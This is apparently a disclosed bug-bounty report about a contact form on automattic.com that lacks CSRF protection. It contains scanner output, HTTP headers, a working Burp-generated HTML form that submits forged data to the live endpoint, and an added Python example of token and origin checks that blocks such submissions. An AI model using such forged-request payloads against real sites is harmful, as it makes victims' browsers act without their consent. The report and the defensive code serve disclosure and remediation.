HTML form without CSRF protection

Disclosed: 2014-07-08 10:00:27 By 0xsaikiran To automattic
Unknown
Vulnerability Details
HTML form without CSRF protection

Vulnerability description
Cross-site request forgery, also known as a one-click attack or session riding and abbreviated as CSRF or XSRF, is a type of malicious exploit of a website whereby unauthorized commands are transmitted from a user that the website trusts. This vulnerability affects /contact.

Attack details
Form action: http://automattic.com/contact/
Form method: POST
Form inputs:
  • your_name [Text]
  • your_email [Text]
  • blog_url [Text]
  • subject [Text]
  • message [TextArea]
  • submit [Submit]

HTTP headers

Request
GET /contact/ HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://automattic.com/contact/
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect-Queries: filelist;aspectalerts
Host: automattic.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*

Response
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 17 Apr 2014 16:08:47 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Vary: Accept-Encoding
Last-Modified: Thu, 17 Apr 2014 16:08:19 GMT
Cache-Control: max-age=272, must-revalidate
X-nananana: Batcache
Vary: Cookie
X-hacker: If you're reading this, you should visit automattic.com/jobs and apply to join the fun, mention this header.
X-Pingback: http://automattic.com/xmlrpc.php
Link: <http://wp.me/Pe4R-7>; rel=shortlink
Original-Content-Encoding: gzip
Content-Length: 16613

The impact of this vulnerability
An attacker may force the users of a web application to execute actions of the attacker's choosing. A successful CSRF exploit can compromise end user data and operation in the case of a normal user. If the targeted end user is the administrator account, this can compromise the entire web application.
How to fix this vulnerability
Check if this form requires CSRF protection and implement CSRF countermeasures if necessary.

PoC:

    <html>
      <!-- CSRF PoC - generated by Burp Suite Professional -->
      <body>
        <form action="http://automattic.com/contact/" method="POST">
          <input type="hidden" name="your&#95;name" value="saddsa" />
          <input type="hidden" name="your&#95;email" value="sdasad&#64;sg&#46;com" />
          <input type="hidden" name="blog&#95;url" value="http&#58;&#47;&#47;www&#46;google&#46;co&#46;in&#47;" />
          <input type="hidden" name="subject" value="sadsa" />
          <input type="hidden" name="message" value="hello" />
          <input type="hidden" name="submit" value="Send" />
          <input type="submit" value="Submit form" />
        </form>
      </body>
    </html>
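The countermeasure the report recommends is normally implemented with the synchronizer-token pattern: the server binds a random token to the user's session, embeds it in the form as a hidden field, and rejects any POST whose token does not match. The Python below is an added example written for this page; it is not code from the report, from Acunetix or from Automattic. It assumes a hypothetical server-side session represented as a dict and a hidden field named `_csrf_token` (both assumptions); the form, header and session data are constructed inline so it runs offline. It also layers an Origin/Referer check on top of the token as defence in depth, and shows why a submission shaped like the PoC above, which carries no token, is refused.

```python
"""Synchronizer-token CSRF protection for a contact-form handler.

Added example for this page; not code from the report or from Automattic.
Assumptions: the server-side session is a dict (standing in for a framework
session store keyed by the session cookie) and the hidden field is named
"_csrf_token". All request data below is constructed for the demo.
"""
import hmac
import secrets
from typing import Optional, Tuple
from urllib.parse import urlsplit

TOKEN_FIELD = "_csrf_token"                 # assumed hidden-field name
TRUSTED_ORIGIN = "http://automattic.com"    # the form's own origin, from the report


def issue_token(session: dict) -> str:
    """Return the session's CSRF token, minting one on first use.

    The token is stored server-side and only ever reaches the browser inside
    the page that renders the form, so a cross-site page cannot read it."""
    if TOKEN_FIELD not in session:
        session[TOKEN_FIELD] = secrets.token_urlsafe(32)
    return session[TOKEN_FIELD]


def render_form(session: dict) -> str:
    """Render the contact form from the report with the token as a hidden input."""
    token = issue_token(session)
    return (
        '<form action="/contact/" method="POST">\n'
        f'  <input type="hidden" name="{TOKEN_FIELD}" value="{token}">\n'
        '  <input type="text" name="your_name">\n'
        '  <input type="text" name="your_email">\n'
        '  <input type="text" name="blog_url">\n'
        '  <input type="text" name="subject">\n'
        '  <textarea name="message"></textarea>\n'
        '  <input type="submit" name="submit" value="Send">\n'
        '</form>'
    )


def source_origin(headers: dict) -> Optional[str]:
    """Derive the request's source origin from Origin, falling back to Referer."""
    origin = headers.get("Origin")
    if origin is not None:
        return origin
    referer = headers.get("Referer")
    if referer is None:
        return None
    parts = urlsplit(referer)
    return f"{parts.scheme}://{parts.netloc}"


def validate_post(session: dict, form: dict, headers: dict) -> Tuple[bool, str]:
    """Accept the POST only if the submitted token matches the session's copy
    and the browser-reported source origin is ours. Returns (accepted, reason)."""
    expected = session.get(TOKEN_FIELD, "")
    submitted = form.get(TOKEN_FIELD, "")
    # Constant-time comparison; encode to bytes so non-ASCII input cannot raise.
    if not expected or not hmac.compare_digest(expected.encode(), submitted.encode()):
        return False, "missing or invalid CSRF token"
    # Defence in depth: a cross-site form post carries the attacking page's
    # Origin (or Referer). A request with neither header is treated as untrusted.
    if source_origin(headers) != TRUSTED_ORIGIN:
        return False, "cross-origin request rejected"
    return True, "ok"


if __name__ == "__main__":
    session = {}                      # constructed: one user's session
    print(render_form(session))
    # A submission shaped like the report's PoC: visible fields only, no token.
    poc_post = {"your_name": "saddsa", "your_email": "sdasad@sg.com",
                "blog_url": "http://www.google.co.in/", "subject": "sadsa",
                "message": "hello", "submit": "Send"}
    print(validate_post(session, poc_post, {"Origin": "http://attacker.invalid"}))
    # The same fields submitted from the real form, token included.
    good_post = dict(poc_post, **{TOKEN_FIELD: session[TOKEN_FIELD]})
    print(validate_post(session, good_post, {"Origin": TRUSTED_ORIGIN}))
```

The token check alone defeats the PoC, because a page on another origin can neither read the hidden field out of the victim's copy of the form nor guess a 256-bit random value. The Origin/Referer comparison is kept as a second, independent layer: if a token ever leaks (for example through a caching mistake like the `Batcache` layer visible in the response headers serving a per-user page), the origin check still refuses a cross-site submission. The comparison uses `hmac.compare_digest` so a wrong token cannot be distinguished from a nearly-right one by timing.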
Report Stats
  • Report ID: 7849
  • State: Closed
  • Substate: informative
  • Upvotes: 4